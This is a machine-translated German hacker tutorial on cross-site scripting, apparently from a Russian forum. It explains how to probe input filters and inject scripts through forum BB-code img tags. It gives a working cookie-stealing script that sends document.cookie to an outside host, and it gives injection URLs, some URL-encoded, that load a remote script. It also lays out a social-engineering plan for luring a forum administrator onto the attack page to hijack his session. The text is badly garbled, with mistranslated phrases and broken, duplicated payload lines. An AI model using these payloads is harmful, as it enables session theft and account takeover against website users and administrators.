Beschreibung Xss von A bis Z.



  • Xss dieser Css => Cross Site Scripting
  • Wie benutzt XSS
  • Was ist XSS-Angriff?
  • Was ist passive und aktive XSS?
  • So bewege ich mich auf speziell, wie die XSS - Website zu finden.
  • Und wie ein Filter oder nicht zu definieren?
  • Aktive XSS
  • Wir tun immer die Art von Codes
  • Als Ersatz für seine Verbindung mit Xss?


  • Xss dieser Css => Cross Site Scripting

    Nicht zu verwechseln mit der CSS-XSS auch nazvyayut
    Zum ersten Mal erschien dieser Bug im Jahr 1997.



    Wie XSS zu verwenden.


    Zuerst müssen wir das, was Plätzchen zu wissen.
    Wenn Sie wissen, können Sie überspringen.

    Cookie dient dazu, die Anmeldeinformationen an den Site-Besucher Computer zu speichern.
    Wenn Sie auf der Website unter dem Spitznamen 'blabluble' registrieren, wird die Website auf Ihrem Computer-Datei mit Cookies gehalten, die Ihre Daten codiert sind.
    Und wenn Sie der Administrator sind, und Sie haben Zugriff auf die Website, und ich - Benutzer, der von Ihnen gestohlen hat (der Administrator) Cookies, dann kann ich sicher auf die Website gehen und die Seite, die ich definiert als "admin" - werde ich über Administratorrechte verfügen.

    So ändern (Substitution gestohlen) Cookies raten ispolzuvat ein Programm für IE CookieEdit oder integrierte Funktionen in Opera und Firefox kostenlos.

    Abzufangen, die Cookies ein Ort, um online zu finden müssen, wo Sie können XSS-Angriff durchführen.


    Was ist XSS-Angriff?


    XSS-Angriffe - es ist ein Angriff nicht auf der Website selbst, sondern auf die Nutzer der Website.
    XSS - dieser Fehler in der Filteranwendung.

    Es gibt aktive und passive XSS XSS.

    Was ist passive und aktive XSS?


    Passiv - diese Xss, die die direkte Beteiligung des Opfers verlangen + spezifischen Einschränkungen und Komplexität hat.
    Daher wird passive XSS nicht sehr geschätzt.
    Zum Beispiel müssen Sie sie durch toxische Verbindung zu gehen bekommen, die Social-Engineering-Tricks erfordern.

    Aktiv - diese XSS, die auf Seiten des Opfers keine zusätzlichen Maßnahmen ergriffen werden müssen - es genügt, nur die Seite mit Ihren XSS zu öffnen und Java-Code wird automatisch ausgeführt.
    Aufgrund seiner automatisierten, - sie sind sehr nützlich und wertvoll.
    Zum Beispiel gibt es aktiv in den CSU-BB-Tags aufgrund unzureichender Filterung, wenn Sie eine Nachricht auf dem Forum \ Gästebuch \ Chat verlassen, die bei jedem Update immer aktiv sein wird.




    So bewege ich mich auf speziell, wie die XSS-Website zu finden.


    Wie ich zuvor schrieb, dass XSS eines Tag besteht, bestehen sie auch aus HTML und Sprache = javascript).

    Javascript können in HTML eingeben.
    Sie können codiert werden, um den Filter zu umgehen. Aber dazu später mehr.

    Wie kann ich wissen, dass die XSS passiert vor Ort dan?
    Terrible rasprastrannёnaya uzyavimost Typ
    <Script> alert () </ script> Versuchen Sie in all den verschiedenen Bereichen dieses Skripts einfügen ... , wenn die Nachricht dann das Skript Prozess kam und zu erfüllen.

    Die meisten Proliferation XSS (nablyudaetsya in allen Orten, wo die Armen Filterung):

    "> <Script> alert () </ script>

    Der springende Punkt ">.

    Lassen Sie uns darüber nachdenken , was wir tun , wenn wir in das Feld "Enter> <script> alert () </ script>, was passiert?

    Wir traten in der Form "> <script> alert () </ script> eine Variable prisvaivaetsya Feldwert. Die Variable verarbeitet wird,"> werden Durchführung, schließt

    Skript und vyprolnyaet <script> alert () </ script>

    Diese XSS ist die Verbreitung in Suchmaschinen finden:

    Sehen Sie alle Felder der Seite und versuchen einfügen "> <script> alert () </ script>
    Wenn eine Nachricht hinterlassen - Sie haben XSS gefunden ...




    Und wie ein Filter oder nicht zu definieren?


    Geben Sie einfach in jedem Bereich: '' - "<########> = & {()}
    Öffnen Sie dann die HTML - Seite und suchen Sie nach dem Wort "########"
    und finden Sie in der folgenden charset Wert ..

    Wenn die <> und ließ es Pervan Zeichen der Verletzlichkeit - es bedeutet , dass der Filter ein Loch hat.
    Wenn " '\ Zeichen die gleichen bleiben , wie sie eingeführt wurden - dies ist das zweite Zeichen der Verletzlichkeit - Mögliche zusätzliche Zeichen XSS - Angriff zu folgen.
    Dann, wenn die HTML - Öffnen Sie nicht <> höchstwahrscheinlich ein Loch im Filter gefunden.
    Wenn die HTML - Öffnung , die Sie finden <> durch andere Zeichen ersetzt, es ist ein doofer - der Filter an
    Es funktioniert normal.
    Vielleicht sogar in das Feld geben Sie den Filter wie folgt zu überprüfen: "> <> '' ', / \ @%?

    Betrachten wir den Fall , wenn der Filter isst <>

    In diesem Fall besteht die Möglichkeit eines Loches.
    Zum Beispiel ist eine Filterbedingung ein <script> zu essen, <>, und.
    Dann versuchen wir , <ZXCVB Skript: alert ();

    Der Filter sieht , dass es nichts Gefährliches in der <IMG% 20SRC = "java script : alert (); Keine schließt und dadurch
    Ausführen des Skripts.

    Immer noch nicht sicher, ob der Filter nicht die andere Codierung filtert dann können Sie versuchen, das Skript und fügen Sie den Code zu kodieren.

    Alle sollten durch Versuch und Irrtum Suche versuchen ...
    Der Versuch, in die Felder eingeben und sehen, was wir aus dem Filter sorgfältig erhalten haben.
    tykov Methode zu verstehen, wie der Filter funktioniert, wenn er irgendwelche Fehler hat.
    Wenn der Filter schlecht ist, können wir immer Scripts einfügen.




    Aktive XSS


    Hier sollte es gestattet Tags verwenden und prekryvayas ihnen, ist es notwendig, die Anforderung zu erfüllen.

    Zum Beispiel, Tags, URL, bb, img.
    Der ganze Sinn der Einfügung ist, dass wir in einer Anfrage an die img oder URL parimetr aufbauen müssen. Wir haben eine Menge von Img Parameterspeicher andere als src und alt.
    Dieser Fehler ist sehr oft im Forum, Gästebuch verwendet ...

    Betrachten wir die aktive XSS.

    Warnungen !!!

    Stichworte [Fon * t], [im * g], [ur * l] pishutsa mit * um shtoby sie nicht mit dem Standortcode zusammengeführt werden.
    Für ispolzuvaniya entfernen diese Tags *.

    Zum Beispiel, ein Forum für die Anwesenheit der Verwendung von Tags sehen [* Fon t], [im * g], [ur * l] und versuchen , sie in einem Skript zu setzen oder sie kombinieren.:

    [Im * g] HTTR: //www.qwewqw.ru/1.jpg [/ im * g] So Kreuz ... img verwendet , bedeutet , und wir holten ihn ab (nur die Tatsache , dass es img die aktiviert und Administratoren erstellen Sie eine Nachricht, die er entfernt ist, sie sagen, dass Sie keine Bilder einbetten können, und es ist im Einsatz
    andere Form), wenn kein Kreuz ist ... und hängt die gesamte Inschrift, dann versuchen Sie dies:
    [Im * g src = HTTR: //www.qwewqw.ru/1.jpg]

    Nun zum Beispiel, haben wir dieses Kreuz gemacht:
    [Im * g] HTTR: //www.qweqw.ru/1.jpg [/ im * g]

    Überprüfen Sie, ob der Filter den Raum hält, einen Raum nach der Erweiterung jpg hinzufügen:
    [Im * g] HTTR: //www.qweqw.ru/1.jpg [/ im * g]
    wenn X - dann ist alles in Ordnung.

    Dann gibt es die img Optionen und dynsrc lowsrc, die JavaScript halten. Versuchen Sie zum Beispiel einzufügen:
    [Im * g] http://www.qwewqw.ru/1.jpg dynsrc = Java - Script: alert () [/ im * g]
    überprüfen, siehe - eine Meldung erhalten - dann gefunden XSS und aktiv jedes Skript einfügen können anstelle von alert ().

    Wenn der Filter nicht aufgegeben wird, versuchen Sie dies:
    [Im * g] http://www.qweqw.ru/ "/ dynsrc =" java script: alert () "/ 1.jpg [/ im * g]
    und
    [Im * g] http://www.qwewqw.ru/ "/ dynsrc = Java - Script: alert () / 1.jpg [/ im * g]

    Wenn diese Beispiele das Kreuz gedreht, dann HTTR: //www.qweqw.ru/1.jpg die Adresse Sniffer ersetzen.

    Es gibt Fälle, in denen jpg deaktiviert admin.




    Wir tun immer die Typ-Codes:


    <script>alert('HakNet')</script>
    java script:alert('HakNet')
    java script:alert('HakNet')/1.jpg и так далие..
    Aber sie brachte keinen Nutzen, es ist nur Code für die Überprüfung (testirovki) auf Xss.

    Hier ist das Skript:
    <script>
    img = new Image();
    img.src = "http://antichat.org/s/HakNet.gif?"+document.cookie;
    </script>
    Er war zu stehlen Cookies =)




    Als Ersatz für seine Verbindung mit Xss?


    Es ist sehr einfach zu ...
    Es gibt nur wenige einfache Möglichkeiten:

    - 1) dies zu tun:
    http://*****.ru/free?p='><script>img=new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;"+document.cookie;</script> <script> img = new Bild (); img.src = "http://antichat.org/s/HakNet.gif" + Dokument http://*****.ru/free?p='><script>img=new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;"+document.cookie;</script> script> wo **** Website Xss.

    Hier ist er vom Skript zusammengestellt:
    '><script>img = new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;</script>
    - 2) Sie können wie diese viel mehr:
    http://*****.ru/free?p='><script src=http://haknet.h16.ru/script/js.js></script> script src = http :? //haknet.h16.ru/script/js.js> </ script> , die den http - Zugriffe: // haknet .h16.ru / script / js.js

    und js.js ist:
    img=new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie; = "http://antichat.org/s/HakNet.gif" + document.cookie; img=new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie; Dieses Verfahren ist zuverlässiger.

    Aber wie ich schon schrieb - manchmal gibt es Schwierigkeiten mit den Filtern auf der Seite (keine Laminate, unser Skript).
    Dann müssen Sie überlegen, wie um es zu bekommen.
    Sie können nur etwas, etwas zu ändern, hinzufügen oder das Skript zu löschen.
    Aber es gibt eine zuverlässigere Option, wenn wir einfach ein Skript kodieren. Dazu gibt es eine Menge von prog.
    Es gibt so eine Website als http://ha.ckers.org/xss.html (Encoder-dekodirovschik).

    Hier ist ein Beispiel:
    %68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E
    es wurde kodiert:

    http://*****.ru/free?p='><script src=http://haknet.h16.ru/script/js.js></script>
    - 3) Verschlüsselung ist besonders notwendig, nicht nur die Filter zu täuschen, aber für den Betrug bei der Verwendung von PASSIVE ADMIN CSU.

    Hier ist ein Beispiel, basierend auf Social Engineering.
    Wir suchen den Kontakt mit dem Admin des Forums offline ihm einen Link zu Ihrer Website zu werfen, und geben Sie govorish so "cooles Feature ist auf der Website" und so dale im gleichen Geist.
    Und auf unserer Website wird Sie ahnen es =) UTB ist das Skript:

    <script language="JavaScript">
    document.location.href="%68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E"
    </script>

    Was macht document.location.href Sie mich fragen? )) .. Ist ein Java-Code, der Cho von einer bestimmten Website ohne Anforderung geht also x wir bekommen, wir den Link zum Administrator geben, und er kam zu unserer Seite, das ist, was getan wird .. es wirft schnell

    %68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E % 2A% 2A% 2A% 2A% 2E% %68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E und es ohnehin schon ist unser Xss in verschlüsselter Form.

    Hinweis: Dies kann nur funktionieren, wenn Xss an den Admin-Website gehören, wo Sie den Link warf ...
    Mit anderen Worten DIFFICULTY PASSIVE CSU ist, dass die Anfälligkeit kann nur verwendet werden, wenn das Opfer in den betroffenen Site angemeldet ist !!!